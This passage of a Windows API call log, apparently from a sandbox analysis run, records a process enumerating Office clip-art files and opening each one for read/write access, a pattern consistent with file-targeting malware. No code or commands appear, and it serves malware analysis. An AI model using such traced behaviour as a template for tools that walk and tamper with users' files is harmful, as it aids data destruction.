ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x292a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS01638_.WMF", cAlternateFileName="")) returned 1 [0103.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.668] AreFileApisANSI () returned 1 [0103.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.668] AreFileApisANSI () returned 1 [0103.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.669] GetFileType (hFile=0x27c) returned 0x1 [0103.669] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.669] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.669] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.669] CloseHandle (hObject=0x27c) returned 1 [0103.669] AreFileApisANSI () returned 1 [0103.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0103.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 69 [0103.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.670] GetFileType (hFile=0x27c) returned 0x1 [0103.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0103.670] CloseHandle (hObject=0x27c) returned 1 [0103.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0103.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0103.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0103.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0103.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0103.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0103.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.671] AreFileApisANSI () returned 1 [0103.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0103.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 69 [0103.671] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x292a)) returned 1 [0103.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0103.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0103.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0103.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.671] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd744774, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x108c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS01639_.WMF", cAlternateFileName="")) returned 1 [0103.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0103.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0103.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0103.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0103.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0103.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0103.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0103.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0103.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0103.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0103.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0103.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0103.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0103.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.672] AreFileApisANSI () returned 1 [0103.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0103.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0103.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0103.673] AreFileApisANSI () returned 1 [0103.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0103.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 69 [0103.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.673] GetFileType (hFile=0x27c) returned 0x1 [0103.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0103.673] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.673] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.674] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.674] CloseHandle (hObject=0x27c) returned 1 [0103.674] AreFileApisANSI () returned 1 [0103.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0103.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 69 [0103.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.674] GetFileType (hFile=0x27c) returned 0x1 [0103.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0103.674] CloseHandle (hObject=0x27c) returned 1 [0103.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.676] AreFileApisANSI () returned 1 [0103.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0103.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 69 [0103.676] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd744774, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x108c)) returned 1 [0103.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0103.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0103.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0103.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.676] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x246a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="CARBN_01.MID", cAlternateFileName="")) returned 1 [0103.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.676] HeapFree 